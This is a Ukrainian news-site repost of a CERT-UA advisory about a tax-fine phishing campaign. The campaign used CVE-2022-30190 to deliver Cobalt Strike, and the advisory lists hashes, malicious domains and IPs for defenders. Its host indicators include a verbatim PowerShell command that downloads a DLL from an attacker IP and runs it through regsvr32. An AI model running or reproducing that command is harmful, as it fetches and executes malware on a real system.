Важливі теми

Посилання скопійовано

Вилучено з «Моїх новин»

Обережно! Нова хвиля кібератаки – листи щодо несплати штрафів

Вилучено з «Моїх новин»

Виявлено шкідливий документ "Накладення штрафних санкцій.docx", відкриття якого призведе до завантаження HTML-файлу та виконання JavaScript-коду

21.06.20221 153

Посилання скопійовано

Обережно! Нова хвиля кібератаки – листи щодо несплати штрафів

Цій статті більше 3-х років. Українське законодавство складне і мінливе, тож на даний момент редакція не гарантує її 100% актуальність. У разі сумнівів скористайтесь пошуком, щоб читати свіжіші статті і консультації, або зверніться за допомогою до нашого ШІ-консультанта.

Загальна інформація

Виявлено шкідливий документ "Накладення штрафних санкцій.docx" відкриття якого призведе до завантаження HTML-файлу та виконання JavaScript-коду (CVE-2022-30190), який забезпечить завантаження та запуск шкідливої програми Cobalt Strike Beacon (дата компіляції: 16.06.2022).

У взаємодії з суб'єктом координації з'ясовано, що згаданий DOCX-документ містився в захищеному паролем архіві "НакладенняШтрафнихСанкцiй.zip", який, в свою чергу, розповсюджувався засобами електронної пошти, начебто, від імені "Державної податкової служби України" (тема листа: "Повідомлення про несплату податку").

Активність має персистентний характер та відстежується за ідентифікатором UAC-0098.

Індикатори компрометації

Файли:

37c7b934661f31e526ffb31f7c935d5a    7d53782fab972b8b70c6c7134598da25fd125c58c88a6d468464cee6c9dbe764        НакладенняШтрафнихСанкцiй.zip 
a3f3402656fc5be4439899b2a5f25eb6    bc6898f0e66582ab92307809a409797749b49948fc265767579b224755b0a17b        Накладення штрафних санкцій.docx
85851e09b368ebba90f5d922cd77f348    02b77a482120b7997f06da67f33cdb286ab06b7ef1bd9dfb2ad77a634595abfe        index.html
52f371a4f06f3398a5a361335920618c    394cbab9eb87ef8ee795d184137ac2634b22a0a3e642534a55c1623a813c8a59        ked.dll (Cobalt Strike Beacon)

Мережеві:

rostyslav.nal0g@gmail[.]com
hXXp://64[.]190.113.51:8000/index[.]html
hXXp://5[.]199.173.152/ked[.]dll
hXXps://baidenfree[.]com/jquery-3.3.1.min.js
baidenfree[.]com
golgba[.]com
domtern[.]com
jorgava[.]com
185[.]143.223.29 (Received)
64[.]190.113.51
5[.]199.173.152
5[.]199.174.219
185[.]170.144.159
87[.]251.64.5
185[.]170.144.158

Хостові:

Invoke-WebRequest -Uri 'http://5.199.173.152/ked.dll' -OutFile 'c:\windows\tasks\ked.dll'; start-process regsvr32.exe -ArgumentList '/s C:\windows\tasks\ked.dll'
C:\windows\tasks\ked.dll

Графічні зображення

Всі новини на тему кібератаки дивиться за посиланням.

***

Увага!

Тепер ви можете читати бухгалтерські новини від «Дебету-Кредиту» у Telegram та VIBER, а обговорювати їх – у найбільшій групі бухгалтерів на Facebook

Приєднуйтесь і дізнавайтесь найважливіші новини першими!

Джерело: CERT-UA

Рубрика: Суспільство і життя/Суспільство, події

Зверніть увагу! Матеріали в розділі «Новини», а також коментарі до них можуть містити аналітичні погляди сторонніх експертів та представників державних органів. Редакція докладає зусиль для перевірки достовірності даних, проте думка авторів може не збігатися з позицією редакції.

Оскільки податкове та бухгалтерське законодавство постійно змінюється, ми рекомендуємо використовувати наведену інформацію як довідкову та звертатися за індивідуальною консультацією перед прийняттям фінансових рішень. Редакція здійснює модерацію коментарів відповідно до Редакційної політики сайту.

Усі новини рубрики «Суспільство, події»

Допомога на проживання ВПО-2026: умови надання
Якщо вам не встановлено інвалідність і ви не працюєте, протягом трьох місяців з дня призначення допомоги маєте сприяти своїй зайнятості (працевлаштуватися або стати на облік в центр зайнятості, або розпочати займатися підприємницькою діяльністю)
Сьогодні 12:043
Житло для ВПО з ТОТ: доступна можливість перевірити місце в черзі на фінансування
Після подання заявки на бронювання коштів через застосунок Дія вона повертається до Реєстру пошкодженого та знищеного майна, де фіксуються точні дані і час
Сьогодні 11:127
Новий «Національний кешбек» з 1 травня 2026 року: як працюватиме програма і скільки можна отримати
Уряд переглянув умови «Нацкешбеку», змістивши фокус із простої підтримки вітчизняних виробників на легалізацію розрахунків. Оновлені правила вводять нові розміри компенсацій, встановлюють вимоги до учасників і передбачають автоматичне нарахування виплат
05.05.2026176
З 4 травня запрацював оновлений перелік доступних ліків
До переліку включено оригінальні інноваційні лікарські засоби, що застосовуються для лікування серцево-судинних захворювань, профілактики інсультів і тромбозів, цукрового діабету 2 типу та хронічних захворювань органів дихання
05.05.202690
Зміна місця реєстрації військовозобовʼязаного: деталі від ЦНАП
Якщо у результаті зміни реєстрації зміниться ТЦК та СП, то попередньо необхідно виконати обов’язок щодо взяття на військовий облік за новим місцем проживання. Без цього нову адресу не зареєструють
05.05.202660

Більше новин

Поставити запитання

фахівцям редакції «Дебет-Кредит»

Моє запитання

Податковий кодекс України 2026 - замовити

Головне

Усі головні

Головне за тиждень

від редакції «Дебет-Кредит»

Останні консультації

Зміна резидентства засновника ТОВ: оновлення даних в ЄДР та податкові ризики у 2026 році
Фізична особа — засновник українського ТОВ змінила статус із резидента України на нерезидента. Чи обов’язково вносити зміни до Єдиного державного реєстру (ЄДР), чи можна це зробити без присутності засновника (через директора), які документи потрібні та чи діє звільнення від цього обов’язку під час воєнного стану?
Повідомлення рієлтерами про укладені за їх посередництвом угоди про оренду нерухомості
СГ, які провадять посередницьку діяльність, пов’язану з наданням послуг з оренди нерухомості (рієлтери), та уклали у звітному періоді ЦПД про оренду нерухомості, за якими однією із сторін є ФО, зобов’язані надсилати Інформацію за місцем своєї реєстрації
Розірвання договору в односторонньому порядку у 2026 році: чи потрібна додаткова угода?
Чи потрібно оформлювати додаткову угоду у разі розірвання договору в односторонньому порядку, якщо таке розірвання передбачене умовами договору або нормами законодавства?
Облік відсотків за позикою від небанківської установи у 2026 році: рахунок
Підприємство отримало позику від небанківської фінансової установи. На якому рахунку бухгалтерського обліку відображати нараховані відсотки за такою позикою?
Генератор на підприємстві – екоподаток та дозвіл на викиди
Підприємство використовує дизельний генератор та зберігає для нього пальне у ємностях у своїх приміщеннях не більше 2 тонн. Чи є при цьому підприємство платником екологічного податку? Чи має воно отримати дозвільний документ (дозвіл на викиди) відповідно до Порядку №302?

Усі консультації

Семінари для бухгалтерів

Курс для кадровиків «Єдиний реєстр кваліфікацій – Класифікатор професій: нова автоматизована система з 2 травня 2026. Нові професійні стандарти, нові трудові функції, нові назви посад та НРК. Матриця трудових функцій та компетентностей»
Лектор: Мойсеєнко Т.
8 травня, пʼятниця
Податок на додану вартість: від документів до декларації (відображення кредиту, операції, блокування документів та інші питання щодо найпроблемнішого податку)
Лектор: Самарченко О.Р.
11 травня, понеділок
Підготовка до, супровід та оскарження результатів податкових перевірок
Лектор: Д.Михайленко, О.Згур'єва, А.Журавльов
12 травня, вівторок
Перевірки ТЦК у 2026: порушення ВО – як впливає на критичність підприємства і бронювання працівників! Моніторинг бронювання та критичності +анюлювання!
Лектор: Мойсеєнко Т.
12 травня, вівторок

Усі семінари

Перевір свого контрагента:

сервіс надано OpenDataBot